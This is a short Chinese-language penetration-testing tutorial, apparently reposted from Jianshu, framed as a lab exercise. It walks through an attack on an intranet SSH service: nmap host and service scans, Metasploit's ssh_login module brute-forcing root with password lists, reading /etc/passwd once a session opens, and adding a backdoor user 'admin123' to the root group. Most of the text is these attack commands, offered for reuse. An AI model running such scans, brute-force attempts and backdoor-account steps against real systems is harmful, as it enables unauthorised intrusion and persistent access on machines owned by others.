内网渗透ssh爆破
掃描局域網存活主機
注意:以下使用的ip地址為我部署的環境網段,如果你在看本文,請靈活的進行學習以及使用。目標主機=靶機
nmap -sP 192.168.1.0/24掃描靶機的操作系統以及版本號
nmap -O 192.168.1.111掃描靶機的應用程序以及應用程序的版本號
nmap -sV 192.168.1.111利用msf ssh_login模塊暴力破解靶機ssh密碼
先打開MSF 進入ssh_login模塊 show options查看提示
使用ssh_login模塊
use auxiliary/scanner/ssh/ssh_login設定靶機IP
set RHOSTS 192.168.1.111設置賬號文件/設置賬號
你可以設置賬號,但是只嘗試這一個,建議你使用賬號文件
#設置賬號 set USERNAME root #設置賬號文件 set USER_FILE 密碼文件設置密碼文件/設置密碼
你可以設置密碼,但是只嘗試這一個,建議你使用密碼文件
#設置密碼 set PASSWORD 123456 #設置密碼文件 set PASS_FILE 密碼文件運行
你既可以使用run也可以使用exploit
會話
查詢會話方面的信息
sessions -i打開會話
#打開id為1的會話 輸入ifconfig查詢ip 成功 sessions -i 1查看密碼文件
cat /etc/passwd添加用戶設置密碼并添加到root組
useradd admin123 passwd admin123 usermod -g root admin123
作者:逍遙呀
鏈接:https://www.jianshu.com/p/c9598aa2f00e
來源:簡書
簡書著作權歸作者所有,任何形式的轉載都請聯系作者獲得授權并注明出處。
總結
- 上一篇: crackme之019
- 下一篇: 文件上传检测的基本思路